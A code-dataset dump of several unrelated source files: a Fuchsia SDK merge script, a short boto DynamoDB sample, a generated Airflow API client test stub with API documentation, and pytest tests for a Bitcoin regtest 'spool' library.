'''Returns the set of elements in the given SDK.'''
with open(os.path.join(sdk_dir, 'meta', 'manifest.json'), 'r') as manifest:
return json.load(manifest)
def _get_meta(element, sdk_dir):
'''Returns the contents of the given element's manifest in a given SDK.'''
with open(os.path.join(sdk_dir, element), 'r') as meta:
return json.load(meta)
def _get_type(element):
'''Returns the SDK element type.'''
# For versioned SDK elements, the type is inside the data field.
if 'schema_id' in element:
return element['data']['type']
return element['type']
def _get_files(element_meta):
'''Extracts the files associated with the given element.
Returns a 2-tuple containing:
- the set of arch-independent files;
- the sets of arch-dependent files, indexed by architecture.
'''
type = _get_type(element_meta)
common_files = set()
arch_files = {}
if type == 'cc_prebuilt_library':
common_files.update(element_meta['headers'])
for arch, binaries in element_meta['binaries'].items():
contents = set()
contents.add(binaries['link'])
if 'dist' in binaries:
contents.add(binaries['dist'])
if 'debug' in binaries:
contents.add(binaries['debug'])
arch_files[arch] = contents
elif type == 'cc_source_library':
common_files.update(element_meta['headers'])
common_files.update(element_meta['sources'])
elif type == 'dart_library':
common_files.update(element_meta['sources'])
elif type == 'fidl_library':
common_files.update(element_meta['sources'])
elif type in ['host_tool', 'companion_host_tool']:
if 'files' in element_meta:
common_files.update(element_meta['files'])
if 'target_files' in element_meta:
arch_files.update(element_meta['target_files'])
elif type == 'loadable_module':
common_files.update(element_meta['resources'])
arch_files.update(element_meta['binaries'])
elif type == 'sysroot':
for arch, version in element_meta['versions'].items():
contents = set()
contents.update(version['headers'])
contents.update(version['link_libs'])
contents.update(version['dist_libs'])
contents.update(version['debug_libs'])
arch_files[arch] = contents
elif type == 'documentation':
common_files.update(element_meta['docs'])
elif type in ('config', 'license', 'component_manifest'):
common_files.update(element_meta['data'])
elif type in ('version_history'):
# These types are pure metadata.
pass
elif type == 'bind_library':
common_files.update(element_meta['sources'])
else:
raise Exception('Unknown element type: ' + type)
return (common_files, arch_files)
def _ensure_directory(path):
'''Ensures that the directory hierarchy of the given path exists.'''
target_dir = os.path.dirname(path)
try:
os.makedirs(target_dir)
except OSError as exception:
if exception.errno == errno.EEXIST and os.path.isdir(target_dir):
pass
else:
raise
def _copy_file(file, source_dir, dest_dir):
'''Copies a file to a given path, taking care of creating directories if
needed.
'''
source = os.path.join(source_dir, file)
destination = os.path.join(dest_dir, file)
_ensure_directory(destination)
shutil.copy2(source, destination)
def _copy_files(files, source_dir, dest_dir):
'''Copies a set of files to a given directory.'''
for file in files:
_copy_file(file, source_dir, dest_dir)
def _copy_identical_files(
set_one, source_dir_one, set_two, source_dir_two, dest_dir):
'''Verifies that two sets of files are absolutely identical and then copies
them to the output directory.
'''
if set_one != set_two:
return False
# Not verifying that the contents of the files are the same, as builds are
# not exactly stable at the moment.
_copy_files(set_one, source_dir_one, dest_dir)
return True
def _copy_element(element, source_dir, dest_dir):
'''Copy an entire SDK element to a given directory.'''
meta = _get_meta(element, source_dir)
common_files, arch_files = _get_files(meta)
files = common_files
for more_files in arch_files.values():
files.update(more_files)
_copy_files(files, source_dir, dest_dir)
# Copy the metadata file as well.
_copy_file(element, source_dir, dest_dir)
def _write_meta(element, source_dir_one, source_dir_two, dest_dir):
'''Writes a meta file for the given element, resulting from the merge of the
meta files for that element in the two given SDK directories.
'''
meta_one = _get_meta(element, source_dir_one)
meta_two = _get_meta(element, source_dir_two)
# TODO(fxbug.dev/5362): verify that the common parts of the metadata files are in
# fact identical.
type = _get_type(meta_one)
meta = {}
if type in ('cc_prebuilt_library', 'loadable_module'):
meta = meta_one
meta['binaries'].update(meta_two['binaries'])
elif type == 'sysroot':
meta = meta_one
meta['versions'].update(meta_two['versions'])
elif type in ['host_tool', 'companion_host_tool']:
meta = meta_one
if not 'target_files' in meta:
meta['target_files'] = {}
if 'target_files' in meta_two:
meta['target_files'].update(meta_two['target_files'])
elif type in ('cc_source_library', 'dart_library', 'fidl_library',
'documentation', 'device_profile', 'config', 'license',
'component_manifest', 'bind_library', 'version_history'):
# These elements are arch-independent, the metadata does not need any
# update.
meta = meta_one
else:
raise Exception('Unknown element type: ' + type)
meta_path = os.path.join(dest_dir, element)
_ensure_directory(meta_path)
with open(meta_path, 'w') as meta_file:
json.dump(
meta, meta_file, indent=2, sort_keys=True, separators=(',', ': '))
return True
def _has_host_content(parts):
'''Returns true if the given list of SDK parts contains an element with
content built for a host.
'''
return 'host_tool' in [part.type for part in parts]
def _write_manifest(source_dir_one, source_dir_two, dest_dir):
'''Writes a manifest file resulting from the merge of the manifest files for
the two given SDK directories.
'''
manifest_one = _get_manifest(source_dir_one)
manifest_two = _get_manifest(source_dir_two)
parts_one = set([Part(p) for p in manifest_one['parts']])
parts_two = set([Part(p) for p in manifest_two['parts']])
manifest = {'arch': {}}
# Schema version.
if manifest_one['schema_version'] != manifest_two['schema_version']:
print('Error: mismatching schema version')
return False
manifest['schema_version'] = manifest_one['schema_version']
# Host architecture.
host_archs = set()
if _has_host_content(parts_one):
host_archs.add(manifest_one['arch']['host'])
if _has_host_content(parts_two):
host_archs.add(manifest_two['arch']['host'])
if not host_archs:
# The archives do not have any host content. The architecture is not
# meaningful in that case but is still needed: just pick one.
host_archs.add(manifest_one['arch']['host'])
if len(host_archs) != 1:
print(
'Error: mismatching host architecture: %s' % ', '.join(host_archs))
return False
manifest['arch']['host'] = list(host_archs)[0]
# Id.
if manifest_one['id'] != manifest_two['id']:
print('Error: mismatching id')
return False
manifest['id'] = manifest_one['id']
# Root.
if manifest_one['root'] != manifest_two['root']:
print('Error: mismatching root')
return False
manifest['root'] = manifest_one['root']
# Target architectures.
manifest['arch']['target'] = sorted(
set(manifest_one['arch']['target']) |
set(manifest_two['arch']['target']))
# Parts.
manifest['parts'] = [vars(p) for p in sorted(parts_one | parts_two)]
manifest_path = os.path.join(dest_dir, 'meta', 'manifest.json')
_ensure_directory(manifest_path)
with open(manifest_path, 'w') as manifest_file:
json.dump(
manifest,
manifest_file,
indent=2,
sort_keys=True,
separators=(',', ': '))
return True
def main():
parser = argparse.ArgumentParser(
description=('Merges the contents of two SDKs'))
first_group = parser.add_mutually_exclusive_group(required=True)
first_group.add_argument(
'--first-archive',
help='Path to the first SDK - as an archive',
default='')
first_group.add_argument(
'--first-directory',
help='Path to the first SDK - as a directory',
default='')
second_group = parser.add_mutually_exclusive_group(required=True)
second_group.add_argument(
'--second-archive',
help='Path to the second SDK - as an archive',
default='')
second_group.add_argument(
'--second-directory',
help='Path to the second SDK - as a directory',
default='')
output_group = parser.add_mutually_exclusive_group(required=True)
output_group.add_argument(
'--output-archive',
help='Path to the merged SDK - as an archive',
default='')
output_group.add_argument(
'--output-directory',
help='Path to the merged SDK - as a directory',
default='')
args = parser.parse_args()
has_errors = False
with _open_archive(args.first_archive, args.first_directory) as first_dir, \
_open_archive(args.second_archive, args.second_directory) as second_dir, \
_open_output(args.output_archive, args.output_directory) as out_dir:
first_elements = set(
[Part(p) for p in _get_manifest(first_dir)['parts']])
second_elements = set(
[Part(p) for p in _get_manifest(second_dir)['parts']])
common_elements = first_elements & second_elements
# Copy elements that appear in a single SDK.
for element in sorted(first_elements - common_elements):
_copy_element(element.meta, first_dir, out_dir)
for element in (second_elements - common_elements):
_copy_element(element.meta, second_dir, out_dir)
# Verify and merge elements which are common to both SDKs.
for raw_element in sorted(common_elements):
element = raw_element.meta
first_meta = _get_meta(element, first_dir)
second_meta = _get_meta(element, second_dir)
first_common, first_arch = _get_files(first_meta)
second_common, second_arch = _get_files(second_meta)
# Common files should not vary.
if not _copy_identical_files(first_common, first_dir, second_common,
second_dir, out_dir):
print('Error: different common files for %s' % (element))
has_errors = True
continue
# Arch-dependent files need to be merged in the metadata.
all_arches = set(first_arch.keys()) | set(second_arch.keys())
for arch in all_arches:
if arch in first_arch and arch in second_arch:
if not _copy_identical_files(first_arch[arch], first_dir,
second_arch[arch], second_dir,
out_dir):
print(
'Error: different %s files for %s' %
(arch, element))
has_errors = True
continue
elif arch in first_arch:
_copy_files(first_arch[arch], first_dir, out_dir)
elif arch in second_arch:
_copy_files(second_arch[arch], second_dir, out_dir)
if not _write_meta(element, first_dir, second_dir, out_dir):
print('Error: unable to merge meta for %s' % (element))
has_errors = True
if not _write_manifest(first_dir, second_dir, out_dir):
print('Error: could not write manifest file')
has_errors = True
# TODO(fxbug.dev/5362): verify that metadata files are valid.
return 1 if has_errors else 0
if __name__ == '__main__':
sys.exit(main())
| scripts/sdk/merger/merge.py | 15,050 | Copy an entire SDK element to a given directory.
Copies a file to a given path, taking care of creating directories if
needed.
Copies a set of files to a given directory.
Verifies that two sets of files are absolutely identical and then copies
them to the output directory.
Ensures that the directory hierarchy of the given path exists.
Extracts the files associated with the given element.
Returns a 2-tuple containing:
- the set of arch-independent files;
- the sets of arch-dependent files, indexed by architecture.
Returns the set of elements in the given SDK.
Returns the contents of the given element's manifest in a given SDK.
Returns the SDK element type.
Returns true if the given list of SDK parts contains an element with
content built for a host.
Manages a directory in which an existing SDK is laid out.
Manages the output of this script.
Writes a manifest file resulting from the merge of the manifest files for
the two given SDK directories.
Writes a meta file for the given element, resulting from the merge of the
meta files for that element in the two given SDK directories.
!/usr/bin/env python3.8 Copyright 2018 The Fuchsia Authors. All rights reserved. Use of this source code is governed by a BSD-style license that can be found in the LICENSE file. Extract the tarball into the temporary directory. This is vastly more efficient than accessing files one by one via the tarfile API. Remove any existing output. Write the archive file. For versioned SDK elements, the type is inside the data field. These types are pure metadata. Not verifying that the contents of the files are the same, as builds are not exactly stable at the moment. Copy the metadata file as well. TODO(fxbug.dev/5362): verify that the common parts of the metadata files are in fact identical. These elements are arch-independent, the metadata does not need any update. Schema version. Host architecture. The archives do not have any host content. The architecture is not meaningful in that case but is still needed: just pick one. Id. Root. Target architectures. Parts. Copy elements that appear in a single SDK. Verify and merge elements which are common to both SDKs. Common files should not vary. Arch-dependent files need to be merged in the metadata. TODO(fxbug.dev/5362): verify that metadata files are valid. | 2,311 | en | 0.876273 |
import boto
from boto.dynamodb2.fields import HashKey
from boto.dynamodb2.table import Table
conn = boto.dynamodb.connect_to_region('us-west-2')
connection=boto.dynamodb2.connect_to_region('us-west-2')
users = Table.create('users', schema=[
HashKey('username'), # defaults to STRING data_type
], throughput={
'read': 5,
'write': 15,
},
)
consumerTable.put_item({"username":"user"})
| samplescripts/create_table.py | 400 | defaults to STRING data_type | 28 | te | 0.103459 |
"""
Airflow API (Stable)
# Overview To facilitate management, Apache Airflow supports a range of REST API endpoints across its objects. This section provides an overview of the API design, methods, and supported use cases. Most of the endpoints accept `JSON` as input and return `JSON` responses. This means that you must usually add the following headers to your request: ``` Content-type: application/json Accept: application/json ``` ## Resources The term `resource` refers to a single type of object in the Airflow metadata. An API is broken up by its endpoint's corresponding resource. The name of a resource is typically plural and expressed in camelCase. Example: `dagRuns`. Resource names are used as part of endpoint URLs, as well as in API parameters and responses. ## CRUD Operations The platform supports **C**reate, **R**ead, **U**pdate, and **D**elete operations on most resources. You can review the standards for these operations and their standard parameters below. Some endpoints have special behavior as exceptions. ### Create To create a resource, you typically submit an HTTP `POST` request with the resource's required metadata in the request body. The response returns a `201 Created` response code upon success with the resource's metadata, including its internal `id`, in the response body. ### Read The HTTP `GET` request can be used to read a resource or to list a number of resources. A resource's `id` can be submitted in the request parameters to read a specific resource. The response usually returns a `200 OK` response code upon success, with the resource's metadata in the response body. If a `GET` request does not include a specific resource `id`, it is treated as a list request. The response usually returns a `200 OK` response code upon success, with an object containing a list of resources' metadata in the response body. When reading resources, some common query parameters are usually available. e.g.: ``` v1/connections?limit=25&offset=25 ``` |Query Parameter|Type|Description| |---------------|----|-----------| |limit|integer|Maximum number of objects to fetch. Usually 25 by default| |offset|integer|Offset after which to start returning objects. For use with limit query parameter.| ### Update Updating a resource requires the resource `id`, and is typically done using an HTTP `PATCH` request, with the fields to modify in the request body. The response usually returns a `200 OK` response code upon success, with information about the modified resource in the response body. ### Delete Deleting a resource requires the resource `id` and is typically executing via an HTTP `DELETE` request. The response usually returns a `204 No Content` response code upon success. ## Conventions - Resource names are plural and expressed in camelCase. - Names are consistent between URL parameter name and field name. - Field names are in snake_case. ```json { \"name\": \"string\", \"slots\": 0, \"occupied_slots\": 0, \"used_slots\": 0, \"queued_slots\": 0, \"open_slots\": 0 } ``` ### Update Mask Update mask is available as a query parameter in patch endpoints. It is used to notify the API which fields you want to update. Using `update_mask` makes it easier to update objects by helping the server know which fields to update in an object instead of updating all fields. The update request ignores any fields that aren't specified in the field mask, leaving them with their current values. Example: ``` resource = request.get('/resource/my-id').json() resource['my_field'] = 'new-value' request.patch('/resource/my-id?update_mask=my_field', data=json.dumps(resource)) ``` ## Versioning and Endpoint Lifecycle - API versioning is not synchronized to specific releases of the Apache Airflow. - APIs are designed to be backward compatible. - Any changes to the API will first go through a deprecation phase. # Summary of Changes | Airflow version | Description | |-|-| | v2.0 | Initial release | | v2.0.2 | Added /plugins endpoint | | v2.1 | New providers endpoint | # Trying the API You can use a third party airflow_client.client, such as [curl](https://curl.haxx.se/), [HTTPie](https://httpie.org/), [Postman](https://www.postman.com/) or [the Insomnia rest airflow_client.client](https://insomnia.rest/) to test the Apache Airflow API. Note that you will need to pass credentials data. For e.g., here is how to pause a DAG with [curl](https://curl.haxx.se/), when basic authorization is used: ```bash curl -X PATCH 'https://example.com/api/v1/dags/{dag_id}?update_mask=is_paused' \\ -H 'Content-Type: application/json' \\ --user \"username:password\" \\ -d '{ \"is_paused\": true }' ``` Using a graphical tool such as [Postman](https://www.postman.com/) or [Insomnia](https://insomnia.rest/), it is possible to import the API specifications directly: 1. Download the API specification by clicking the **Download** button at top of this document 2. Import the JSON specification in the graphical tool of your choice. - In *Postman*, you can click the **import** button at the top - With *Insomnia*, you can just drag-and-drop the file on the UI Note that with *Postman*, you can also generate code snippets by selecting a request and clicking on the **Code** button. ## Enabling CORS [Cross-origin resource sharing (CORS)](https://developer.mozilla.org/en-US/docs/Web/HTTP/CORS) is a browser security feature that restricts HTTP requests that are initiated from scripts running in the browser. For details on enabling/configuring CORS, see [Enabling CORS](https://airflow.apache.org/docs/apache-airflow/stable/security/api.html). # Authentication To be able to meet the requirements of many organizations, Airflow supports many authentication methods, and it is even possible to add your own method. If you want to check which auth backend is currently set, you can use `airflow config get-value api auth_backend` command as in the example below. ```bash $ airflow config get-value api auth_backend airflow.api.auth.backend.basic_auth ``` The default is to deny all requests. For details on configuring the authentication, see [API Authorization](https://airflow.apache.org/docs/apache-airflow/stable/security/api.html). # Errors We follow the error response format proposed in [RFC 7807](https://tools.ietf.org/html/rfc7807) also known as Problem Details for HTTP APIs. As with our normal API responses, your airflow_client.client must be prepared to gracefully handle additional members of the response. ## Unauthenticated This indicates that the request has not been applied because it lacks valid authentication credentials for the target resource. Please check that you have valid credentials. ## PermissionDenied This response means that the server understood the request but refuses to authorize it because it lacks sufficient rights to the resource. It happens when you do not have the necessary permission to execute the action you performed. You need to get the appropriate permissions in other to resolve this error. ## BadRequest This response means that the server cannot or will not process the request due to something that is perceived to be a airflow_client.client error (e.g., malformed request syntax, invalid request message framing, or deceptive request routing). To resolve this, please ensure that your syntax is correct. ## NotFound This airflow_client.client error response indicates that the server cannot find the requested resource. ## MethodNotAllowed Indicates that the request method is known by the server but is not supported by the target resource. ## NotAcceptable The target resource does not have a current representation that would be acceptable to the user agent, according to the proactive negotiation header fields received in the request, and the server is unwilling to supply a default representation. ## AlreadyExists The request could not be completed due to a conflict with the current state of the target resource, e.g. the resource it tries to create already exists. ## Unknown This means that the server encountered an unexpected condition that prevented it from fulfilling the request. # noqa: E501
The version of the OpenAPI document: 1.0.0
Contact: dev@airflow.apache.org
Generated by: https://openapi-generator.tech
"""
import sys
import unittest
import airflow_client.client
from airflow_client.client.model.dag import DAG
globals()['DAG'] = DAG
from airflow_client.client.model.dag_collection_all_of import DAGCollectionAllOf
class TestDAGCollectionAllOf(unittest.TestCase):
"""DAGCollectionAllOf unit test stubs"""
def setUp(self):
pass
def tearDown(self):
pass
def testDAGCollectionAllOf(self):
"""Test DAGCollectionAllOf"""
# FIXME: construct object with mandatory attributes with example values
# model = DAGCollectionAllOf() # noqa: E501
pass
if __name__ == '__main__':
unittest.main()
| airflow_client/test/test_dag_collection_all_of.py | 8,993 | DAGCollectionAllOf unit test stubs
Test DAGCollectionAllOf
Airflow API (Stable)
# Overview To facilitate management, Apache Airflow supports a range of REST API endpoints across its objects. This section provides an overview of the API design, methods, and supported use cases. Most of the endpoints accept `JSON` as input and return `JSON` responses. This means that you must usually add the following headers to your request: ``` Content-type: application/json Accept: application/json ``` ## Resources The term `resource` refers to a single type of object in the Airflow metadata. An API is broken up by its endpoint's corresponding resource. The name of a resource is typically plural and expressed in camelCase. Example: `dagRuns`. Resource names are used as part of endpoint URLs, as well as in API parameters and responses. ## CRUD Operations The platform supports **C**reate, **R**ead, **U**pdate, and **D**elete operations on most resources. You can review the standards for these operations and their standard parameters below. Some endpoints have special behavior as exceptions. ### Create To create a resource, you typically submit an HTTP `POST` request with the resource's required metadata in the request body. The response returns a `201 Created` response code upon success with the resource's metadata, including its internal `id`, in the response body. ### Read The HTTP `GET` request can be used to read a resource or to list a number of resources. A resource's `id` can be submitted in the request parameters to read a specific resource. The response usually returns a `200 OK` response code upon success, with the resource's metadata in the response body. If a `GET` request does not include a specific resource `id`, it is treated as a list request. The response usually returns a `200 OK` response code upon success, with an object containing a list of resources' metadata in the response body. When reading resources, some common query parameters are usually available. e.g.: ``` v1/connections?limit=25&offset=25 ``` |Query Parameter|Type|Description| |---------------|----|-----------| |limit|integer|Maximum number of objects to fetch. Usually 25 by default| |offset|integer|Offset after which to start returning objects. For use with limit query parameter.| ### Update Updating a resource requires the resource `id`, and is typically done using an HTTP `PATCH` request, with the fields to modify in the request body. The response usually returns a `200 OK` response code upon success, with information about the modified resource in the response body. ### Delete Deleting a resource requires the resource `id` and is typically executing via an HTTP `DELETE` request. The response usually returns a `204 No Content` response code upon success. ## Conventions - Resource names are plural and expressed in camelCase. - Names are consistent between URL parameter name and field name. - Field names are in snake_case. ```json { "name": "string", "slots": 0, "occupied_slots": 0, "used_slots": 0, "queued_slots": 0, "open_slots": 0 } ``` ### Update Mask Update mask is available as a query parameter in patch endpoints. It is used to notify the API which fields you want to update. Using `update_mask` makes it easier to update objects by helping the server know which fields to update in an object instead of updating all fields. The update request ignores any fields that aren't specified in the field mask, leaving them with their current values. Example: ``` resource = request.get('/resource/my-id').json() resource['my_field'] = 'new-value' request.patch('/resource/my-id?update_mask=my_field', data=json.dumps(resource)) ``` ## Versioning and Endpoint Lifecycle - API versioning is not synchronized to specific releases of the Apache Airflow. - APIs are designed to be backward compatible. - Any changes to the API will first go through a deprecation phase. # Summary of Changes | Airflow version | Description | |-|-| | v2.0 | Initial release | | v2.0.2 | Added /plugins endpoint | | v2.1 | New providers endpoint | # Trying the API You can use a third party airflow_client.client, such as [curl](https://curl.haxx.se/), [HTTPie](https://httpie.org/), [Postman](https://www.postman.com/) or [the Insomnia rest airflow_client.client](https://insomnia.rest/) to test the Apache Airflow API. Note that you will need to pass credentials data. For e.g., here is how to pause a DAG with [curl](https://curl.haxx.se/), when basic authorization is used: ```bash curl -X PATCH 'https://example.com/api/v1/dags/{dag_id}?update_mask=is_paused' \ -H 'Content-Type: application/json' \ --user "username:password" \ -d '{ "is_paused": true }' ``` Using a graphical tool such as [Postman](https://www.postman.com/) or [Insomnia](https://insomnia.rest/), it is possible to import the API specifications directly: 1. Download the API specification by clicking the **Download** button at top of this document 2. Import the JSON specification in the graphical tool of your choice. - In *Postman*, you can click the **import** button at the top - With *Insomnia*, you can just drag-and-drop the file on the UI Note that with *Postman*, you can also generate code snippets by selecting a request and clicking on the **Code** button. ## Enabling CORS [Cross-origin resource sharing (CORS)](https://developer.mozilla.org/en-US/docs/Web/HTTP/CORS) is a browser security feature that restricts HTTP requests that are initiated from scripts running in the browser. For details on enabling/configuring CORS, see [Enabling CORS](https://airflow.apache.org/docs/apache-airflow/stable/security/api.html). # Authentication To be able to meet the requirements of many organizations, Airflow supports many authentication methods, and it is even possible to add your own method. If you want to check which auth backend is currently set, you can use `airflow config get-value api auth_backend` command as in the example below. ```bash $ airflow config get-value api auth_backend airflow.api.auth.backend.basic_auth ``` The default is to deny all requests. For details on configuring the authentication, see [API Authorization](https://airflow.apache.org/docs/apache-airflow/stable/security/api.html). # Errors We follow the error response format proposed in [RFC 7807](https://tools.ietf.org/html/rfc7807) also known as Problem Details for HTTP APIs. As with our normal API responses, your airflow_client.client must be prepared to gracefully handle additional members of the response. ## Unauthenticated This indicates that the request has not been applied because it lacks valid authentication credentials for the target resource. Please check that you have valid credentials. ## PermissionDenied This response means that the server understood the request but refuses to authorize it because it lacks sufficient rights to the resource. It happens when you do not have the necessary permission to execute the action you performed. You need to get the appropriate permissions in other to resolve this error. ## BadRequest This response means that the server cannot or will not process the request due to something that is perceived to be a airflow_client.client error (e.g., malformed request syntax, invalid request message framing, or deceptive request routing). To resolve this, please ensure that your syntax is correct. ## NotFound This airflow_client.client error response indicates that the server cannot find the requested resource. ## MethodNotAllowed Indicates that the request method is known by the server but is not supported by the target resource. ## NotAcceptable The target resource does not have a current representation that would be acceptable to the user agent, according to the proactive negotiation header fields received in the request, and the server is unwilling to supply a default representation. ## AlreadyExists The request could not be completed due to a conflict with the current state of the target resource, e.g. the resource it tries to create already exists. ## Unknown This means that the server encountered an unexpected condition that prevented it from fulfilling the request. # noqa: E501
The version of the OpenAPI document: 1.0.0
Contact: dev@airflow.apache.org
Generated by: https://openapi-generator.tech
FIXME: construct object with mandatory attributes with example values model = DAGCollectionAllOf() noqa: E501 | 8,464 | en | 0.839024 |
# -*- coding: utf-8 -*-
from __future__ import division, unicode_literals
from __future__ import absolute_import
from uuid import uuid1
from datetime import datetime
import pytest
import pytz
from pycoin.key.BIP32Node import BIP32Node
from transactions import Transactions
from transactions.services.daemonservice import BitcoinDaemonService
def test_blockchainspider_init(rpcuser, rpcpassword, host, port):
from spool.spoolex import BlockchainSpider
blockchain_spider = BlockchainSpider(
testnet=True,
service='daemon',
username=rpcuser,
password=rpcpassword,
host=host,
port=port,
)
assert isinstance(blockchain_spider._t, Transactions)
assert blockchain_spider._t.testnet is True
assert blockchain_spider._t._service._username == rpcuser
assert blockchain_spider._t._service._password == rpcpassword
assert blockchain_spider._t._service._host == host
assert blockchain_spider._t._service._port == port
assert isinstance(blockchain_spider._t._service, BitcoinDaemonService)
@pytest.mark.usefixtures('init_blockchain')
def test_check_script(rpconn, piece_hashes, spool_regtest, transactions):
"""
Test :staticmethod:`check_script`.
Args;
alice (str): bitcoin address of alice, the sender
bob (str): bitcoin address of bob, the receiver
rpconn (AuthServiceProxy): JSON-RPC connection
(:class:`AuthServiceProxy` instance) to bitcoin regtest
transactions (Transactions): :class:`Transactions` instance to
communicate to the bitcoin regtest node
"""
from spool import Spool
from spool.spoolex import BlockchainSpider
sender_password = uuid1().hex.encode('utf-8')
sender_wallet = BIP32Node.from_master_secret(sender_password,
netcode='XTN')
sender_address = sender_wallet.bitcoin_address()
rpconn.importaddress(sender_address)
rpconn.sendtoaddress(sender_address, Spool.FEE/100000000)
rpconn.sendtoaddress(sender_address, Spool.TOKEN/100000000)
rpconn.sendtoaddress(sender_address, Spool.TOKEN/100000000)
rpconn.sendtoaddress(sender_address, Spool.TOKEN/100000000)
rpconn.generate(1)
receiver_address = rpconn.getnewaddress()
# TODO do not rely on Spool
txid = spool_regtest.transfer(
('', sender_address),
receiver_address,
piece_hashes,
sender_password,
5,
min_confirmations=1,
)
verb = BlockchainSpider.check_script(transactions.get(txid)['vouts'])
assert verb == b'ASCRIBESPOOL01TRANSFER5'
@pytest.mark.usefixtures('init_blockchain')
def test_check_script_with_invalid_tx(eve, wendy, rpconn, transactions):
"""
An invalid transaction in this context is one that does not contain a
``vout`` for which the ``hex`` is a valid ``Spool`` verb.
Args;
eve (str): bitcoin address of eve, the sender
wendy (str): bitcoin address of wendy, the receiver
rpconn (AuthServiceProxy): JSON-RPC connection
(:class:`AuthServiceProxy` instance) a local bitcoin regtest
transactions (Transactions): :class:`Transactions` instance to
communicate to the bitcoin regtest node
"""
from spool.spoolex import BlockchainSpider
rpconn.sendtoaddress(eve, 2)
rpconn.generate(1)
txid = rpconn.sendfrom('eve', wendy, 1)
decoded_raw_transfer_tx = transactions.get(txid)
with pytest.raises(Exception) as exc:
BlockchainSpider.check_script(decoded_raw_transfer_tx['vouts'])
assert exc.value.args[0] == 'Invalid ascribe transaction'
@pytest.mark.usefixtures('init_blockchain')
def test_get_addresses(rpconn, piece_hashes, spool_regtest, transactions):
from spool import Spool
from spool.spoolex import BlockchainSpider
sender_password = uuid1().hex.encode('utf-8')
sender_wallet = BIP32Node.from_master_secret(sender_password,
netcode='XTN')
sender_address = sender_wallet.bitcoin_address()
rpconn.importaddress(sender_address)
rpconn.sendtoaddress(sender_address, Spool.FEE/100000000)
rpconn.sendtoaddress(sender_address, Spool.TOKEN/100000000)
rpconn.sendtoaddress(sender_address, Spool.TOKEN/100000000)
rpconn.sendtoaddress(sender_address, Spool.TOKEN/100000000)
rpconn.generate(1)
receiver_address = rpconn.getnewaddress()
# TODO do not rely on Spool
txid = spool_regtest.transfer(
('', sender_address),
receiver_address,
piece_hashes,
sender_password,
5,
min_confirmations=1,
)
decoded_raw_transfer_tx = transactions.get(txid)
addresses = BlockchainSpider._get_addresses(decoded_raw_transfer_tx)
assert len(addresses) == 3
assert addresses[0] == sender_address
assert addresses[1] == receiver_address
assert addresses[2] == piece_hashes[0]
@pytest.mark.usefixtures('init_blockchain')
def test_get_addresses_with_invalid_tx(eve, wendy, rpconn, transactions):
"""
An invalid transaction in this context is one that has inputs from
different addresses.
Args;
eve (str): bitcoin address of eve, the sender
wendy (str): bitcoin address of wendy, the receiver
rpconn (AuthServiceProxy): JSON-RPC connection
(:class:`AuthServiceProxy` instance) a local bitcoin regtest
transactions (Transactions): :class:`Transactions` instance to
communicate to the bitcoin regtest node
"""
from spool.spoolex import BlockchainSpider, InvalidTransactionError
rpconn.sendtoaddress(eve, 1)
rpconn.sendtoaddress(eve, 1)
rpconn.generate(1)
txid = rpconn.sendfrom('eve', wendy, 2)
decoded_raw_transfer_tx = transactions.get(txid)
with pytest.raises(InvalidTransactionError) as exc:
BlockchainSpider._get_addresses(decoded_raw_transfer_tx)
assert isinstance(exc.value, InvalidTransactionError)
def test_decode_op_return():
from spool.spoolex import BlockchainSpider
op_return_hex = '6a174153435249424553504f4f4c30315452414e5346455235'
op_return = BlockchainSpider.decode_op_return(op_return_hex)
assert op_return == b'ASCRIBESPOOL01TRANSFER5'
def test_get_time_utc():
from spool.spoolex import BlockchainSpider, TIME_FORMAT
time = '2016-06-13T17:28:03 UTC'
timestamp = BlockchainSpider._get_time_utc(time)
assert timestamp
assert datetime.fromtimestamp(timestamp,
tz=pytz.UTC).strftime(TIME_FORMAT) == time
def test_simplest_history(federation, alice, piece_hashes,
spool_regtest, spider, rpconn):
txid = spool_regtest.register_piece(
('', federation),
alice,
piece_hashes,
b'federation-secret',
min_confirmations=1,
)
rpconn.generate(1)
history = spider.history(piece_hashes[0])
assert len(history) == 1
assert '' in history
assert len(history['']) == 1
piece_registration_data = history[''][0]
assert piece_registration_data['action'] == 'PIECE'
assert piece_registration_data['edition_number'] == ''
assert piece_registration_data['from_address'] == federation
assert piece_registration_data['number_editions'] == 0
assert piece_registration_data['piece_address'] == piece_hashes[0]
assert piece_registration_data['timestamp_utc']
assert piece_registration_data['to_address'] == alice
assert piece_registration_data['txid'] == txid
assert piece_registration_data['verb'] == b'ASCRIBESPOOL01PIECE'
def test_register_editions_qty_history(federation,
alice,
registered_piece_hashes,
spool_regtest,
spider,
rpconn):
txid = spool_regtest.editions(
('', federation),
alice,
registered_piece_hashes,
b'federation-secret',
3,
min_confirmations=1,
)
rpconn.generate(1)
history = spider.history(registered_piece_hashes[0])
assert len(history) == 2
assert '' in history
assert 0 in history
assert len(history['']) == 1
assert len(history[0]) == 1
editions_data = history[0][0]
assert editions_data['action'] == 'EDITIONS'
assert editions_data['edition_number'] == 0
assert editions_data['from_address'] == federation
assert editions_data['number_editions'] == 3
assert editions_data['piece_address'] == registered_piece_hashes[0]
assert editions_data['timestamp_utc']
assert editions_data['to_address'] == alice
assert editions_data['txid'] == txid
assert editions_data['verb'] == b'ASCRIBESPOOL01EDITIONS3'
def test_register_edition_history(federation, alice, spool_regtest, spider,
registered_edition_qty_hashes, rpconn):
edition_number = 2
piece_hash = registered_edition_qty_hashes[0]
txid = spool_regtest.register(
('', federation),
alice,
registered_edition_qty_hashes,
b'federation-secret',
edition_number,
min_confirmations=1,
)
rpconn.generate(1)
history = spider.history(piece_hash)
assert len(history) == 3
assert '' in history
assert 0 in history
assert edition_number in history
assert len(history['']) == 1
assert len(history[0]) == 1
assert len(history[edition_number]) == 1
edition_registration_data = history[edition_number][0]
assert edition_registration_data['action'] == 'REGISTER'
assert edition_registration_data['edition_number'] == edition_number
assert edition_registration_data['from_address'] == federation
assert edition_registration_data['number_editions'] == 3
assert edition_registration_data['piece_address'] == piece_hash
assert edition_registration_data['timestamp_utc']
assert edition_registration_data['to_address'] == alice
assert edition_registration_data['txid'] == txid
assert edition_registration_data['verb'] == b'ASCRIBESPOOL01REGISTER2'
def test_transfer_history(federation, alice, bob, spool_regtest, spider,
registered_edition_two_hashes, rpconn):
from .conftest import reload_address
reload_address(alice, rpconn)
edition_number = 2
piece_hash = registered_edition_two_hashes[0]
txid = spool_regtest.transfer(
('', alice),
bob,
registered_edition_two_hashes,
b'alice-secret',
edition_number,
min_confirmations=1,
)
rpconn.generate(1)
history = spider.history(piece_hash)
assert len(history) == 3
assert '' in history
assert 0 in history
assert edition_number in history
assert len(history['']) == 1
assert len(history[0]) == 1
